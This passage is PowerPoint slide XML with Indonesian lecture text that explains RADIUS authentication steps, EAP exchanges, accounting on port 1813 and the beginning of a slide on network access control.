              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>informasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>paket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Access-Request RADIUS, yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dienkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rahasia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bersama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Klien RADIUS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengirimkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Access-Request </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> server AAA </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> UDP pada port 1812 (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> default)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Server AAA </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendekripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Permintaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Akses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rahasia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bersama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Jika </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Permintaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Akses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>didekripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rahasia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bersama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikonfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>benar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>misalnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>), server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>merespons</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> EAP, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pertukaran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>paket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Access-Challenge dan Access-Request </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>saat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>metode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>autentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diatur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kredensial</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diverifikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. NAS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bertindak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pass-thru, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengambil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pesan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> RADIUS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> server, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengenkapsulasinya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>EAPoL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikirim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemohon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akhir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pertukaran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pemohon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diautentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, server AAA </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>merespons</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>paket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Access-Accept; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>paket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Access-Reject </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikembalikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>opsional</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, NAS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> RADIUS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akuntansi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pencatatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>). </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Akuntansi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> port 1813. Server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akuntansi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berbeda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>autentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>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201</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="302930647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Kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> Akses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Jaringan</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kontrol</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (NAC) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hanya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengautentikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebelum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengizinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengakses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tetapi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memeriksa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menegakkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kepatuhan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhadap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kebijakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>telah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ditetapkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengevaluasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>versi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>operasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tingkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> patch, status antivirus, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keberadaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tertentu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, NAC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memastikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memenuhi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>standar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> minimum </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebelum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diberikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. NAC juga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membatasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
